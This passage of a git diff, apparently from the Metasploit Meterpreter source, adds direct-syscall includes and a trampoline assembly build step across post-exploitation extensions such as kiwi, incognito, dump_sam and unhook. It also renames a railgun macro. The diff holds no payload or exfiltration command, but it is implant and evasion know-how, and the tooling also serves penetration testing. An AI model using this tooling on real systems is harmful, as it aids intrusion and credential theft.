RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" Command customCommands[] = diff --git a/c/meterpreter/source/extensions/extapi/extapi.c b/c/meterpreter/source/extensions/extapi/extapi.c old mode 100644 new mode 100755 index f78025122..85a465074 --- a/c/meterpreter/source/extensions/extapi/extapi.c +++ b/c/meterpreter/source/extensions/extapi/extapi.c @@ -10,6 +10,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "window.h" diff --git a/c/meterpreter/source/extensions/incognito/incognito.c b/c/meterpreter/source/extensions/incognito/incognito.c old mode 100644 new mode 100755 index ce97bce7b..af8eeb509 --- a/c/meterpreter/source/extensions/incognito/incognito.c +++ b/c/meterpreter/source/extensions/incognito/incognito.c @@ -15,6 +15,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" DWORD request_incognito_list_tokens(Remote *remote, Packet *packet); diff --git a/c/meterpreter/source/extensions/kiwi/main.c b/c/meterpreter/source/extensions/kiwi/main.c index fd47a8552..8186e3431 100755 --- a/c/meterpreter/source/extensions/kiwi/main.c +++ b/c/meterpreter/source/extensions/kiwi/main.c @@ -10,6 +10,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "main.h" diff --git a/c/meterpreter/source/extensions/lanattacks/lanattacks.c b/c/meterpreter/source/extensions/lanattacks/lanattacks.c old mode 100644 new mode 100755 index db69a4fb7..476ecf4a2 --- a/c/meterpreter/source/extensions/lanattacks/lanattacks.c +++ b/c/meterpreter/source/extensions/lanattacks/lanattacks.c @@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "lanattacks.h" diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.c b/c/meterpreter/source/extensions/peinjector/peinjector.c index 6d7bccf38..cf005be73 100755 --- a/c/meterpreter/source/extensions/peinjector/peinjector.c +++ b/c/meterpreter/source/extensions/peinjector/peinjector.c @@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "peinjector_bridge.h" diff --git a/c/meterpreter/source/extensions/powershell/powershell.c b/c/meterpreter/source/extensions/powershell/powershell.c index a95ca1221..c9993abd9 100755 --- a/c/meterpreter/source/extensions/powershell/powershell.c +++ b/c/meterpreter/source/extensions/powershell/powershell.c @@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "powershell_bridge.h" diff --git a/c/meterpreter/source/extensions/priv/priv.c b/c/meterpreter/source/extensions/priv/priv.c old mode 100644 new mode 100755 index 36cc04d73..6fa39cb5a --- a/c/meterpreter/source/extensions/priv/priv.c +++ b/c/meterpreter/source/extensions/priv/priv.c @@ -8,6 +8,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! diff --git a/c/meterpreter/source/extensions/python/python_main.c b/c/meterpreter/source/extensions/python/python_main.c index e7d9b8c55..09a862805 100755 --- a/c/meterpreter/source/extensions/python/python_main.c +++ b/c/meterpreter/source/extensions/python/python_main.c @@ -10,6 +10,7 @@ MetApi* met_api = NULL; #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "python_commands.h" diff --git a/c/meterpreter/source/extensions/sniffer/sniffer.c b/c/meterpreter/source/extensions/sniffer/sniffer.c old mode 100644 new mode 100755 index 45838ff87..44756bf8e --- a/c/meterpreter/source/extensions/sniffer/sniffer.c +++ b/c/meterpreter/source/extensions/sniffer/sniffer.c @@ -36,6 +36,7 @@ Command customCommands[] = // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){ met_api->packet.transmit_response(hErr, remote, response);return(hErr); } diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c index 879c9c7c6..67c18f186 100755 --- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c +++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c @@ -220,32 +220,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput ) #ifdef _WIN64 switch( dwStackSizeInElements ) { - case 0: pOutput->qwReturnValue = function( 00 )(); break; - case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break; - case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break; - case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break; - case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break; - case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break; - case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; - case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; - case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; - case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; - case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; - case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; - case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; - case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; - case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; - case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; - case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; - case 17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; - case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; - case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; - case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; - case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; - case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; - case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; - case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; - case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; + case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break; + case 1: pOutput->qwReturnValue = stdcall_func( 01 )( p(0) ); break; + case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break; + case 3: pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break; + case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break; + case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break; + case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; + case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; + case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; + case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; + case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; + case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; + case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; + case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; + case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; + case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; + case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; + case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; + case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; + case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; + case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; + case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; + case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; + case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; + case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; + case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; default: dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements ); @@ -295,32 +295,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput ) } else { // STDCALL switch( dwStackSizeInElements ) { - case 0: pOutput->qwReturnValue = function( 00 )(); break; - case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break; - case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break; - case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break; - case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break; - case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break; - case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; - case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; - case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; - case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; - case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; - case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; - case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; - case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; - case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; - case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; - case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; - case 17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; - case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; - case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; - case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; - case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; - case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; - case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; - case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; - case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; + case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break; + case 1: pOutput->qwReturnValue = stdcall_func( 01 )( p(0) ); break; + case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break; + case 3: pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break; + case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break; + case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break; + case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; + case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; + case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; + case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; + case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; + case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; + case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; + case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; + case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; + case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; + case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; + case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; + case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; + case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; + case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; + case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; + case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; + case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; + case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; + case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; default: dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements ); diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h old mode 100644 new mode 100755 index 32a2d0427..6439e7019 --- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h +++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h @@ -47,7 +47,7 @@ typedef struct _RAILGUN_OUTPUT } RAILGUN_OUTPUT; #define p(i) (ULONG_PTR)pStack[i] -#define function(i) ((STDCALL_FUNC_##i)pFuncAddr) +#define stdcall_func(i) ((STDCALL_FUNC_##i)pFuncAddr) #define cdecl_func(i) ((CDECL_FUNC_##i)pFuncAddr) typedef ULONG_PTR (__stdcall * STDCALL_FUNC_00)( VOID ); diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c old mode 100644 new mode 100755 index c9f54d2d0..503cd0426 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" // NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor diff --git a/c/meterpreter/source/extensions/unhook/unhook.c b/c/meterpreter/source/extensions/unhook/unhook.c old mode 100644 new mode 100755 index 381dba3f1..1a7d350a7 --- a/c/meterpreter/source/extensions/unhook/unhook.c +++ b/c/meterpreter/source/extensions/unhook/unhook.c @@ -6,6 +6,7 @@ #include "common_metapi.h" #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "unhook.h" diff --git a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp old mode 100644 new mode 100755 index e85e7bb37..f8646af4e --- a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp +++ b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp @@ -7,6 +7,7 @@ extern "C" { #include "common_metapi.h" #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #ifndef min diff --git a/c/meterpreter/source/metsrv/metsrv.c b/c/meterpreter/source/metsrv/metsrv.c old mode 100644 new mode 100755 index 93773e661..b039e3bc4 --- a/c/meterpreter/source/metsrv/metsrv.c +++ b/c/meterpreter/source/metsrv/metsrv.c @@ -10,6 +10,7 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.c" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.c" diff --git a/c/meterpreter/source/metsrv/metsrv.h b/c/meterpreter/source/metsrv/metsrv.h old mode 100644 new mode 100755 index e73aaacd8..7013b66d5 --- a/c/meterpreter/source/metsrv/metsrv.h +++ b/c/meterpreter/source/metsrv/metsrv.h @@ -18,6 +18,10 @@ #include "remote_dispatch.h" #include "libloader.h" +#define EXITFUNC_SEH 0xEA320EFE +#define EXITFUNC_THREAD 0x0A2A1DE0 +#define EXITFUNC_PROCESS 0x56A2B5F0 + #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.h" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h" diff --git a/c/meterpreter/source/screenshot/screenshot.c b/c/meterpreter/source/screenshot/screenshot.c old mode 100644 new mode 100755 index 11d49ad52..1a70b6d25 --- a/c/meterpreter/source/screenshot/screenshot.c +++ b/c/meterpreter/source/screenshot/screenshot.c @@ -9,6 +9,7 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* diff --git a/c/meterpreter/workspace/CMakeLists.txt b/c/meterpreter/workspace/CMakeLists.txt index cdf3207a6..21b9b1d16 100644 --- a/c/meterpreter/workspace/CMakeLists.txt +++ b/c/meterpreter/workspace/CMakeLists.txt @@ -225,6 +225,8 @@ if(BUILD_METSRV) set(MET_SERVERS metsrv) endif() +set(MET_RDI_ASM ReflectiveDLLInjection) + set( MET_DLLS ${MET_SERVERS} @@ -234,6 +236,7 @@ set( set( MET_PROJECTS + ${MET_RDI_ASM} ${MET_LIBS} ${MET_DLLS} ) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt new file mode 100644 index 000000000..f94f03797 --- /dev/null +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt @@ -0,0 +1,19 @@ +cmake_minimum_required(VERSION 3.15.7 FATAL_ERROR) + +set(PROJECT_NAME ReflectiveDLLInjection) + +project(${PROJECT_NAME} ASM) + +set(SRC_DIR ../../source/ReflectiveDLLInjection/dll/src) +if("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(x86_64|amd64)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline64.s) +elseif("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(i386|i686)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline32.s) +endif() + +set_property(DIRECTORY PROPERTY COMPILE_DEFINITIONS) +set_property(DIRECTORY PROPERTY INCLUDE_DIRECTORIES) +set(CMAKE_ASM_FLAGS_RELEASE_INIT "") +set(CMAKE_ASM_FLAGS_RELEASE "") + +add_library(${PROJECT_NAME} ${SRC_FILES}) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj index ba50be544..dce0c22b2 100644 --- a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj @@ -187,16 +187,28 @@ + + + + + true + true + + + true + true + + diff --git a/c/meterpreter/workspace/dump_sam/CMakeLists.txt b/c/meterpreter/workspace/dump_sam/CMakeLists.txt index 06842a04a..d69b3ded8 100644 --- a/c/meterpreter/workspace/dump_sam/CMakeLists.txt +++ b/c/meterpreter/workspace/dump_sam/CMakeLists.txt @@ -25,7 +25,7 @@ if(MSVC) endif() set(LINK_LIBS psapi rpcrt4) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) 